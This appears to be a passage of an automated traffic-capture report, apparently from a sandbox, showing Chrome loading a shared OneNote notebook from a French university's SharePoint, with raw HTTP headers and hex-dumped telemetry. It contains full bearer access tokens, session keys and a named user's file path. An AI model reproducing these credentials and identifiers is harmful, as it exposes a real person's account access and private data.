ZlYWIyY2I0OWQwOTQ1ODk3MjdlYWIxYmUxYzs7VHJ1ZTs7OzE2NDUyO2U3MDM2YmEwLTcwNmUtNTAwMC00OThmLTE3NWNlNzI3YWI3ZCJ9%2EsWPE0Mi%5F9gW%5FffKnO8oq5FCtaqaFrdG7m9RJ0kI2OUcIloscTHKr52Bm2bqPxV3nAgOVmnTx98enfDYcjDeDCiTmdpNkLvz5Pnf6VPKkfv%5FbKIs%2Drbd5yUQA2Nrui2Or1BPa4YD%5FgiIPc2IM%2DuPA9Ir6q630GjwzwYZSA75ZPsah0S05fxdYbO409JtCcbuWPm9wxKF6fXuzj4a5BXymEKErX0RGpwF2EMjP87wd6ZCsbyt7Uj%5FZfliEYXMiGslCTbAsKCdwEvxJxgKuM%2DoTxwojbkKFt%2DvdVpF6s4Yko1%5FuP8G1YZ%2DuhEfXO563WQIDix6ogZ4sg4b4dLWXrpm0iw&access_token_ttl=1664840298518&ObjectDataBlobId=%7Bf163baa0-7287-46a8-a69b-124fda05d771%7D%7B1%7D&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015&waccluster=GEU2&wdwacuseragent=MSWACONSync&DataUrlEnabled=true HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                haep: 1
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-Requested-With: XMLHttpRequest
                                                X-UserType: WOPI
                                                X-xhr: 1
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:22 UTC392INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Length: 8446
                                                Content-Type: text/plain; charset=utf-8
                                                Expires: Tue, 03 Oct 2023 13:38:22 GMT
                                                ETag: "WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffiles%2F924d3cd4da7e4e62a9e70ac99fd2a5dd&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTgiLCJleHAiOiIxNjY0ODQwMjk4IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjkyNGQzY2Q0ZGE3ZTRlNjJhOWU3MGFjOTlmZDJhNWRkO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDs5MDhkNGZlYWIyY2I0OWQwOTQ1ODk3MjdlYWIxYmUxYzs7VHJ1ZTs7OzE2NDUyO2U3MDM2YmEwLTcwNmUtNTAwMC00OThmLTE3NWNlNzI3YWI3ZCJ9%2EsWPE0Mi%5F9gW%5FffKnO8oq5FCtaqaFrdG7m9RJ0kI2OUcIloscTHKr52Bm2bqPxV3nAgOVmnTx98enfDYcjDeDCiTmdpNkLvz5Pnf6VPKkfv%5FbKIs%2Drbd5yUQA2Nrui2Or1BPa4YD%5FgiIPc2IM%2DuPA9Ir6q630GjwzwYZSA75ZPsah0S05fxdYbO409JtCcbuWPm9wxKF6fXuzj4a5BXymEKErX0RGpwF2EMjP87wd6ZCsbyt7Uj%5FZfliEYXMiGslCTbAsKCdwEvxJxgKuM%2DoTxwojbkKFt%2DvdVpF6s4Yko1%5FuP8G1YZ%2DuhEfXO563WQIDix6ogZ4sg4b4dLWXrpm0iw&access_token_ttl=1664840298518{f163baa0-7287-46a8-a69b-124fda05d771}{1}"
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 9d646b08-be09-4379-9438-9cbb369add49
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF0000069D
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF0000069D
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: D3F6C3A0E0B54BD6B3C76E4F4DFF5C2E Ref B: AMS231032607049 Ref C: 2022-10-03T13:38:21Z
                                                Date: Mon, 03 Oct 2022 13:38:22 GMT
                                                Connection: close
                                                2022-10-03 13:38:22 UTC394INData Raw: 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 67 41 41 41 43 72 43 41 4d 41 41 41 44 69 69 76 48 70 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 44 65 55 45 78 55 52 66 2f 2f 2f 2b 37 75 37 75 33 74 37 66 66 33 39 2f 54 30 39 50 72 36 2b 76 48 78 38 66 7a 38 2f 44 49 7a 4e 53 38 77 4d 75 38 2b 4e 6b 4e 46 52 53 49 6a 4a 69 77 75 4d 45 70 4c 54 53 59 6e 4b 61 75 72 71 2b 66 6e 36 4c 65 33 74 35 2b 67 6f 52 51 56 47 5a 61 58 6d 54 59 33 4f 51 30 51 46 4f 30 2f 4e 68 34 66 49 69 6b 71 4c 4f 38 75 49 2b 37 32 39 75 34 33 4c 75 34 79 4b 50 4f 48 67 63 4c 44 78 46 5a 58 56 2b 37 45 77
                                                Data Ascii: data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASgAAACrCAMAAADiivHpAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAADeUExURf///+7u7u3t7ff39/T09Pr6+vHx8fz8/DIzNS8wMu8+NkNFRSIjJiwuMEpLTSYnKaurq+fn6Le3t5+goRQVGZaXmTY3OQ0QFO0/Nh4fIikqLO8uI+729u43Lu4yKPOHgcLDxFZXV+7Ew
                                                2022-10-03 13:38:22 UTC396INData Raw: 39 30 64 79 39 71 68 36 51 41 57 67 4a 69 41 55 49 47 63 50 42 30 51 43 44 4a 30 44 68 74 4d 5a 34 4b 45 7a 59 49 41 75 33 75 38 31 75 33 2f 79 74 45 54 6a 34 6e 4e 4b 71 65 4d 53 73 38 38 31 31 42 46 31 31 4d 50 69 4a 42 55 65 70 73 4c 44 4e 45 64 67 75 6c 4d 42 37 45 35 6c 79 33 4b 6e 4f 51 49 54 55 4b 53 4f 59 71 45 4f 77 55 64 30 52 79 78 55 7a 43 41 62 36 6d 52 31 6c 42 4f 71 54 57 64 59 34 55 4d 35 4a 30 50 48 4c 58 63 42 58 4f 34 73 6e 52 57 4b 67 64 49 4a 73 45 49 78 73 45 4b 68 53 34 62 4e 4f 6c 51 5a 74 79 69 68 73 6e 51 72 6f 64 42 65 43 66 57 62 43 53 56 54 6c 52 6d 52 4d 35 6e 50 59 49 5a 30 75 4b 31 51 47 54 44 68 5a 4d 36 75 5a 68 79 71 6f 64 4e 51 71 7a 43 35 50 68 77 4a 71 41 71 6f 5a 45 42 59 71 58 47 37 35 67 45 68 67 42 6c 6d 67 45 50
                                                Data Ascii: 90dy9qh6QAWgJiAUIGcPB0QCDJ0DhtMZ4KEzYIAu3u81u3/ytETj4nNKqeMSs8811BF11MPiJBUepsLDNEdgulMB7E5ly3KnOQITUKSOYqEOwUd0RyxUzCAb6mR1lBOqTWdY4UM5J0PHLXcBXO4snRWKgdIJsEIxsEKhS4bNOlQZtyihsnQrodBeCfWbCSVTlRmRM5nPYIZ0uK1QGTDhZM6uZhyqodNQqzC5PhwJqAqoZEBYqXG75gEhgBlmgEP


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                16192.168.2.34976913.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:22 UTC379OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":7,"MsSinceStart":4218,"Value":"RecordAppInteractive","Type":"BootPhaseCompleted"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:22 UTC387INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 22f045d3-fed6-49ae-b411-bc8b6ffa4000
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006AB
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006AB
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: B295D3FCC08A48BE864048C8F0E65BCF Ref B: AMS231032604033 Ref C: 2022-10-03T13:38:22Z
                                                Date: Mon, 03 Oct 2022 13:38:21 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                17192.168.2.34977013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:22 UTC381OUTPOST /o/RemoteTelemetry.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 125
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:22 UTC381OUTData Raw: 7b 22 74 79 70 65 22 3a 22 4a 53 41 50 49 5f 53 54 41 54 45 22 2c 22 70 61 79 6c 6f 61 64 4a 73 6f 6e 22 3a 22 7b 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 5c 22 3a 5c 22 4f 6e 65 4e 6f 74 65 5c 22 2c 5c 22 62 75 69 6c 64 5c 22 3a 5c 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 5c 22 2c 5c 22 73 74 61 74 65 5c 22 3a 5c 22 62 6f 6f 74 53 75 63 63 65 73 73 5c 22 7d 22 7d
                                                Data Ascii: {"type":"JSAPI_STATE","payloadJson":"{\"application\":\"OneNote\",\"build\":\"16.0.15707.41015\",\"state\":\"bootSuccess\"}"}
                                                2022-10-03 13:38:22 UTC391INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: efb0de6c-fa35-4e73-ac5c-31749fac181a
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: PA1PEPF0000BDB8
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU5
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: PA1PEPF0000BDB8
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wordslice,afd_excelslice,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: E2589D38B72746EEB164B685C0CF8E66 Ref B: AMS231032605023 Ref C: 2022-10-03T13:38:22Z
                                                Date: Mon, 03 Oct 2022 13:38:22 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                18192.168.2.34977113.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:22 UTC381OUTPOST /o/RemoteUls.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&officeserverversion=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 4458
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:22 UTC382OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 36 39 37 33 34 38 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 39 35 37 31 34 37 31 35 2c 22 54 22 3a 36 30 30 2c 22 4d 22 3a 22 52 65 63 65 69 76 65 64 20 6d 65 73 73 61 67 65 49 64 3a 20 57 61 63 5f 41 70 70 42 6f 6f 74 53 74 61 74 65 2c 20 63 6f 72 72 65 6c 61 74 69 6f 6e 3a 20 75 6e 64 65 66 69 6e 65 64 22 2c 22 43 22 3a 33 37 39 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 39 36 34 36 34 32 38 38 2c 22 54 22 3a 36 30 30 2c 22 4d 22 3a 22 50 72 6f 63 65 73 73 69 6e 67 20 6d 65 73 73 61 67 65 3a 20 57 61 63 5f 41 70 70 42 6f 6f 74 53 74 61 74 65 22 2c 22 43 22 3a 33 37 39 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 39 35 37 31 34 32 37 31 2c 22 54 22 3a 36 30 30 2c 22 4d 22 3a 22 57 41 43 20 42 6f 6f 74 20 41 70 70 20 73 74
                                                Data Ascii: {"T":1664836697348,"L":[{"G":595714715,"T":600,"M":"Received messageId: Wac_AppBootState, correlation: undefined","C":379,"D":50},{"G":596464288,"T":600,"M":"Processing message: Wac_AppBootState","C":379,"D":50},{"G":595714271,"T":600,"M":"WAC Boot App st
                                                2022-10-03 13:38:22 UTC388INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 965a9bab-c9c5-437c-858a-f687957a1a0b
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: PA1PEPF00009464
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU4
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-bULS-SuppressedTags: 378069,1671813,2209344,3249545,3290144,4298965,4298968,4298969,4751696,5306497,5904476,6375195,6572226,6948167,7463498,17085210,17085216,17162522,17358857,19743902,19939648,20486158,21627712,21631370,22401293,22410500,22558617,22598977,22680210,22680213,22680214,22836558,22946650,23909858,24401375,24462656,24515087,25514973,33592839,34388130,35682372,36472266,36546380,36546381,36546382,36569418,36708451,36773964,36791688,36811158,36811159,36963655,37288035,37876293,37876294,37889309,38293640,38535900,38543496,38580697,38637954,38922202,39076766,39076767,39105358,39408129,39613840,39966341,40437001,40777251,40935455,40957978,40957979,41003225,41207258,41502555,41711299,41952657,41964821,41964885,42272991,42496725,42513088,42815875,42857251,50406866,50431969,50619726,50622685,50622687,51451613,51492170,51504083,51667010,306230939,306978834,520979847,521007315,521749855,524150164,524883107,524883136,524883138,537159499,537169937,538542792,538543587,539075678,539874723,540378699,540378700,542700237,542994947,545783884,557077970,557322386,557389507,557670930,558735363,559423838,559424262,559486496,559760215,559760216,570507662,571549507,571786073,571786074,574468116,575157663,575157664,575157665,575157666,575157667,575157696,575157697,575157698,575157699,575157700,575157701,575157702,577295376,577626581,577831138,578164000,587862985,589101015,589101018,591684683,591729363,592259104,592556551,592843145,593780815,593838232,593862981,594134597,594396706,594830612,595137156,595714715,595895774,596115913,596444186,596464289,845836083,845836084,845836085,846166132,876178018,963472182,1630679666,1630679667,1633958006,1647605351,1664576567,1698260075,1718235956,1765045358,1802139698,1986689397,1986689633,1986689647,1986748791,1986748793,1986749030,1986749288,1986749546,2004443760,2004444278,2004448354
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: PA1PEPF00009464
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: FE0C81B08BF64AA7A4CDB02A70A338ED Ref B: AMS231032603053 Ref C: 2022-10-03T13:38:22Z
                                                Date: Mon, 03 Oct 2022 13:38:21 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                19192.168.2.34978313.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:23 UTC403OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 13240
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
